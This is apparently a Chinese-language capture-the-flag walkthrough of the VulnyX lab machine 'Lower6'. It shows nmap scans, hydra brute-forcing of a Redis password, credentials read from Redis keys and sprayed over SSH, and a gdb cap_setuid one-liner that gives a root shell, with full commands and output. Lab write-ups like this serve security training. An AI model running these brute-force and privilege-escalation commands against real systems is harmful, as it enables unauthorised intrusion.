Vlx_Lower6

靶机来源： https://vulnyx.com/

难度：Low

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-19 14:31 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00024s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00015s latency).
MAC Address: 08:00:27:A9:B8:16 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.93
Host is up (0.00048s latency).
MAC Address: 08:00:27:B5:B9:DB (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.44 seconds

靶机IP：192.168.2.93

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.93                   
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-19 14:32 +0800
Nmap scan report for 192.168.2.93
Host is up (0.00055s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
6379/tcp open  redis
MAC Address: 08:00:27:B5:B9:DB (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 5.31 seconds

开放端口：22、6379

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,6379 192.168.2.93
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-19 14:32 +0800
Nmap scan report for 192.168.2.93
Host is up (0.00087s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
| ssh-hostkey: 
|   256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_  256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
6379/tcp open  redis   Redis key-value store
MAC Address: 08:00:27:B5:B9:DB (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.01 seconds

3.udp扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.93                      
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-19 14:33 +0800
Nmap scan report for 192.168.2.93
Host is up (0.00098s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:B5:B9:DB (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 111.46 seconds

二、Redis服务

访问redis服务，发现需要密码

┌──(root㉿kali)-[~/miaosec]
└─# redis-cli -h 192.168.2.93       
192.168.2.93:6379> INFO
NOAUTH Authentication required.

1、Redis密码爆破

使用hydra对密码进行爆破

┌──(root㉿kali)-[/tmp]
└─# hydra -P /usr/share/wordlists/rockyou.txt -t 4 redis://192.168.2.93
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-19 14:41:10
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking redis://192.168.2.93:6379/
[STATUS] 2263.00 tries/min, 2263 tries in 00:01h, 14342136 to do in 105:38h, 4 active
[6379][redis] host: 192.168.2.93   password: hellow
[STATUS] attack finished for 192.168.2.93 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-19 14:43:11

成功获取到密码：hellow

使用密码成功进入

192.168.2.93:6379> AUTH hellow
OK
192.168.2.93:6379> INFO
# Server
redis_version:7.0.15
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:3f20e06e76a2b578
redis_mode:standalone
os:Linux 6.1.0-37-amd64 x86_64
arch_bits:64
monotonic_clock:POSIX clock_gettime
multiplexing_api:epoll
atomicvar_api:c11-builtin
gcc_version:12.2.0
process_id:417
process_supervised:systemd
run_id:5e58fd7a89f3b6ab8d26d5a2c099ec2f6c19ac43
tcp_port:6379
server_time_usec:1773902678057674
uptime_in_seconds:792
uptime_in_days:0
hz:10
configured_hz:10
lru_clock:12294998
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf
io_threads_active:0

# Clients
connected_clients:1
cluster_connections:0
maxclients:10000
client_recent_max_input_buffer:20480
client_recent_max_output_buffer:0
blocked_clients:0
tracking_clients:0
clients_in_timeout_table:0

# Memory
used_memory:928072
used_memory_human:906.32K
used_memory_rss:17424384
used_memory_rss_human:16.62M
used_memory_peak:1032224
used_memory_peak_human:1008.03K
used_memory_peak_perc:89.91%
used_memory_overhead:878504
used_memory_startup:876208
used_memory_dataset:49568
used_memory_dataset_perc:95.57%
allocator_allocated:1418536
allocator_active:1773568
allocator_resident:4182016
total_system_memory:1007435776
total_system_memory_human:960.77M
used_memory_lua:31744
used_memory_vm_eval:31744
used_memory_lua_human:31.00K
used_memory_scripts_eval:0
number_of_cached_scripts:0
number_of_functions:0
number_of_libraries:0
used_memory_vm_functions:32768
used_memory_vm_total:64512
used_memory_vm_total_human:63.00K
used_memory_functions:200
used_memory_scripts:200
used_memory_scripts_human:200B
maxmemory:0
maxmemory_human:0B
maxmemory_policy:noeviction
allocator_frag_ratio:1.25
allocator_frag_bytes:355032
allocator_rss_ratio:2.36
allocator_rss_bytes:2408448
rss_overhead_ratio:4.17
rss_overhead_bytes:13242368
mem_fragmentation_ratio:19.25
mem_fragmentation_bytes:16519304
mem_not_counted_for_evict:0
mem_replication_backlog:0
mem_total_replication_buffers:0
mem_clients_slaves:0
mem_clients_normal:1800
mem_cluster_links:0
mem_aof_buffer:0
mem_allocator:jemalloc-5.3.0
active_defrag_running:0
lazyfree_pending_objects:0
lazyfreed_objects:0

# Persistence
loading:0
async_loading:0
current_cow_peak:0
current_cow_size:0
current_cow_size_age:0
current_fork_perc:0.00
current_save_keys_processed:0
current_save_keys_total:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1773901886
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:-1
rdb_current_bgsave_time_sec:-1
rdb_saves:0
rdb_last_cow_size:0
rdb_last_load_keys_expired:0
rdb_last_load_keys_loaded:5
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_rewrites:0
aof_rewrites_consecutive_failures:0
aof_last_write_status:ok
aof_last_cow_size:0
module_fork_in_progress:0
module_fork_last_cow_size:0

# Stats
total_connections_received:11
total_commands_processed:4551
instantaneous_ops_per_sec:0
total_net_input_bytes:123123
total_net_output_bytes:291656
total_net_repl_input_bytes:0
total_net_repl_output_bytes:0
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
instantaneous_input_repl_kbps:0.00
instantaneous_output_repl_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
expired_stale_perc:0.00
expired_time_cap_reached_count:0
expire_cycle_cpu_milliseconds:15
evicted_keys:0
evicted_clients:0
total_eviction_exceeded_time:0
current_eviction_exceeded_time:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
pubsubshard_channels:0
latest_fork_usec:0
total_forks:0
migrate_cached_sockets:0
slave_expires_tracked_keys:0
active_defrag_hits:0
active_defrag_misses:0
active_defrag_key_hits:0
active_defrag_key_misses:0
total_active_defrag_time:0
current_active_defrag_time:0
tracking_total_keys:0
tracking_total_items:0
tracking_total_prefixes:0
unexpected_error_replies:0
total_error_replies:4564
dump_payload_sanitizations:0
total_reads_processed:4577
total_writes_processed:4566
io_threaded_reads_processed:0
io_threaded_writes_processed:0
reply_buffer_shrinks:8
reply_buffer_expands:0

# Replication
role:master
connected_slaves:0
master_failover_state:no-failover
master_replid:20e867b689d082238180ad9fd54e6dd997f0e37a
master_replid2:0000000000000000000000000000000000000000
master_repl_offset:0
second_repl_offset:-1
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0

# CPU
used_cpu_sys:1.776994
used_cpu_user:0.829264
used_cpu_sys_children:0.000000
used_cpu_user_children:0.000271
used_cpu_sys_main_thread:1.776380
used_cpu_user_main_thread:0.828977

# Modules

# Errorstats
errorstat_NOAUTH:count=15
errorstat_WRONGPASS:count=4549

# Cluster
cluster_enabled:0

# Keyspace
db0:keys=5,expires=0,avg_ttl=0

2、Redis-key读取

查看所有的key

192.168.2.93:6379> KEYS *
1) "key1"
2) "key3"
3) "key4"
4) "key5"
5) "key2"

对所有的key进行读取

192.168.2.93:6379> GET key1
"killer:K!ll3R123"
192.168.2.93:6379> GET key2
"ghost:Ghost!Hunter42"
192.168.2.93:6379> GET key3
"snake:Pixel_Sn4ke77"
192.168.2.93:6379> GET key4
"wolf:CyberWolf#21"
192.168.2.93:6379> GET key5
"shadow:ShadowMaze@9"

三、获取killer权限

使用hydra对获取到的账号和密码进行爆破

┌──(root㉿kali)-[/tmp]
└─# hydra -t 4 -L user.txt -P pass.txt ssh://192.168.2.93
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-19 14:55:21
[DATA] max 4 tasks per 1 server, overall 4 tasks, 25 login tries (l:5/p:5), ~7 tries per task
[DATA] attacking ssh://192.168.2.93:22/
[22][ssh] host: 192.168.2.93   login: killer   password: ShadowMaze@9
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-19 14:55:38

成功获取到登录凭证：killer:ShadowMaze@9

获取到shell

┌──(root㉿kali)-[/tmp]
└─# ssh killer@192.168.2.93
killer@192.168.2.93's password: 
-bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8)
killer@lower6:~$ id
uid=1000(killer) gid=1000(killer) groups=1000(killer)

四、权限提升

使用linpeas.sh跑一遍，发现/usr/bin/gdb具有 capabilities 的文件

Files with capabilities (limited to 50):
/usr/bin/ping cap_net_raw=ep
/usr/bin/gdb cap_setuid=ep
killer@lower6:/tmp$ cat /proc/sys/kernel/yama/ptrace_scope
0

• 0：无限制 → 普通用户可用 gdb 附加到任何进程（包括 setuid 程序），可提权
• **1**（默认 Ubuntu/Debian）：只能附加到自己拥有的进程 → GDB 无法直接提权
• **2 或 3**：更严格限制

直接进行提取

killer@lower6:/tmp$ gdb
GNU gdb (Debian 13.1-3) 13.1
Copyright (C) 2023 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word".
(gdb) python import os; os.setuid(0); os.execl("/bin/sh", "sh", "-p")
# id
uid=0(root) gid=1000(killer) groups=1000(killer)

或者

killer@lower6:/tmp$ gdb -q --batch -ex 'python import os; os.setuid(0); os.system("/bin/sh")'
# id
uid=0(root) gid=1000(killer) groups=1000(killer)

五、查看FLAG

# cat /root/root.txt /home/killer/user.txt
03f4adf5855fe3a1e0df4b0c885ec67a
8ec061fc51f064186d2b0661c004be93